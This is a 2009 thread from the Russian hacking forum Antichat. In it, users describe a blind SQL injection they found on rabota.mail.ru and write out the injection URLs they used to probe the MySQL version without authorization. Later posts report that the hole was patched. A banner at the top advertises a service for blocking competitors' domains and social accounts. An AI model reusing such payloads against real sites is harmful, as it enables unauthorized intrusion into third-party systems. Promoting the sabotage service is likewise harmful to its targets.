Форум АНТИЧАТ - баг на mail.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
баг на mail.ru

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

баг на mail.ru

26.02.2009, 21:05

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Отправить сообщение для -m0rgan- с помощью ICQ

баг на mail.ru

Вот нашол SQL injection на mail.ru
Crekm слепая, без вывода...
внимательно смотрим на формировку наги:

Код:

http://rabota.mail.ru/vac_search/?go=1&from_search=1&query=

Код:

http://rabota.mail.ru/vac_search/?go=1'&from_search=1&query=

смотрим версию мускула:

Код:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=

пятая...

вроди как возможно внедрение SQL кода...

Дальше не докрутил, ибо не силён в подзапросах...

26.02.2009, 21:21

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Не знаю, какая там 5-ая...

У меня страница

Код:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=

Код:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=4--&from_search=1&query=

одинаковые..

А вот так:

Код:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=3--&from_search=1&query=

Другой результат...

26.02.2009, 21:25

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

у меня новости меняются.

26.02.2009, 21:27

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

да и не в версии дело, бага то есть...

26.02.2009, 21:32

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Ну, в случае с маилом, уже не особо удивляет блинд скуля.. Учитывая, что недавно была инъекция с выводом ^^

26.02.2009, 21:32

_==wolf==_

Участник форума

Регистрация: 29.05.2008

Сообщений: 181

Провел на форуме:
979048

Репутация: 101

Отправить сообщение для _==wolf==_ с помощью ICQ

прикрыли о_О

26.02.2009, 21:33

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Ну да, я cразу зашёл и прикрыл ^^

26.02.2009, 21:34

_==wolf==_

Участник форума

Регистрация: 29.05.2008

Сообщений: 181

Провел на форуме:
979048

Репутация: 101

да правда прикрыли!

26.02.2009, 21:48

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Я это багу нашол недели 3 назад...

#10

26.02.2009, 21:51

Ponchik

Постоянный

Регистрация: 30.08.2005

Сообщений: 730

Провел на форуме:
6828219

Репутация: 2274

Смысл ложить такое в паблик =\

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход